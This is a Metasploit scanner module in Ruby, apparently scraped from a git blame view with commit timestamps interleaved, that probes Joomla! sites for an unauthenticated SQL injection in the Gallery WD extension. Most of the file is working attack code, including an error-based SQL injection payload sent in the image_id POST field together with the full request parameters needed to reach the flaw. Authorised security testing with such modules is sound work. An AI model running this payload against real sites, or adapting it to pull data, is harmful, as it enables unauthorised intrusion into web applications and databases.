2015-03-28 21:15:51 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'uri'
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf :: Auxiliary
2015-03-28 21:15:51 +00:00
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Auxiliary :: Scanner
include Msf :: Auxiliary :: Report
def initialize ( info = { } )
super ( update_info ( info ,
2015-03-30 22:17:48 +00:00
'Name' = > 'Gallery WD for Joomla! Unauthenticated SQL Injection Scanner' ,
2015-03-28 21:15:51 +00:00
'Description' = > %q{
2015-03-30 22:17:48 +00:00
This module will scan for Joomla ! instances vulnerable to an unauthenticated SQL injection
within the Gallery WD for Joomla ! extension version 1 . 2 . 5 and likely prior .
2015-03-28 21:15:51 +00:00
} ,
'Author' = >
[
2015-03-30 22:17:48 +00:00
'CrashBandicoot' , #independent discovery/0day drop
'bperry' #discovery/metasploit module
2015-03-28 21:15:51 +00:00
] ,
'License' = > MSF_LICENSE ,
'References' = >
[
2015-03-30 22:17:48 +00:00
[ 'EDB' , '36563' ]
2015-03-28 21:15:51 +00:00
] ,
2015-03-30 22:17:48 +00:00
'DisclosureDate' = > 'Mar 30 2015' ) )
2015-03-28 21:15:51 +00:00
2015-03-30 22:17:48 +00:00
register_options ( [
OptString . new ( 'TARGETURI' , [ true , 'Target URI of the Joomla! instance' , '/' ] )
] , self . class )
2015-03-28 21:15:51 +00:00
end
def run_host ( ip )
right_marker = Rex :: Text . rand_text_alpha ( 5 )
2015-03-30 22:17:48 +00:00
left_marker = Rex :: Text . rand_text_alpha ( 5 )
2015-03-28 21:15:51 +00:00
flag = Rex :: Text . rand_text_alpha ( 5 )
2016-02-01 22:06:34 +00:00
vprint_status ( " Checking host " )
2015-03-28 21:15:51 +00:00
res = send_request_cgi ( {
'uri' = > normalize_uri ( target_uri . path , 'index.php' ) ,
'method' = > 'POST' ,
'vars_get' = > {
'option' = > 'com_gallery_wd' ,
'view' = > 'gallerybox' ,
'image_id' = > '-1' ,
'gallery_id' = > '-1' ,
'thumb_width' = > '180' ,
'thumb_height' = > '90' ,
'open_with_fullscreen' = > 0 ,
'image_width' = > 800 ,
'image_height' = > 500 ,
'image_effect' = > 'fade' ,
'sort_by' = > 'order' ,
'order_by' = > 'asc' ,
'enable_image_filmstrip' = > '' ,
'image_filmstrip_height' = > 0 ,
'enable_image_ctrl_btn' = > 1 ,
'enable_image_fullscreen' = > 1 ,
'popup_enable_info' = > 1 ,
'popup_info_always_show' = > 0 ,
'popup_hit_counter' = > 0 ,
'popup_enable_rate' = > 0 ,
'slideshow_interval' = > 5 ,
'enable_comment_social' = > '' ,
'enable_image_facebook' = > '' ,
'enable_image_twitter' = > '' ,
'enable_image_google' = > '' ,
'enable_image_pinterest' = > '' ,
'enable_image_tumblr' = > '' ,
'watermark_type' = > 'none'
} ,
'vars_post' = > {
'image_id' = > " 1 AND (SELECT 2425 FROM(SELECT COUNT(*),CONCAT(0x #{ left_marker . unpack ( " H* " ) [ 0 ] } ,0x #{ flag . unpack ( " H* " ) [ 0 ] } ,0x #{ right_marker . unpack ( " H* " ) [ 0 ] } ,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) " ,
'rate' = > '' ,
'ajax_task' = > 'save_hit_count' ,
'task' = > 'gallerybox.ajax_search'
}
} )
unless res && res . body
2016-02-01 22:06:34 +00:00
vprint_error ( " Server did not respond in an expected way " )
2015-03-28 21:15:51 +00:00
return
end
result = res . body =~ / #{ left_marker } #{ flag } #{ right_marker } /
if result
2016-02-01 22:06:34 +00:00
print_good ( " Vulnerable to unauthenticated SQL injection within Gallery WD for Joomla! " )
2015-03-28 21:15:51 +00:00
report_vuln ( {
:host = > rhost ,
:port = > rport ,
:proto = > 'tcp' ,
2015-03-30 22:17:48 +00:00
:name = > " Unauthenticated error-based SQL injection in Gallery WD for Joomla! " ,
:refs = > self . references . select { | ref | ref . ctx_val == " 36563 " }
2015-03-28 21:15:51 +00:00
} )
end
end
end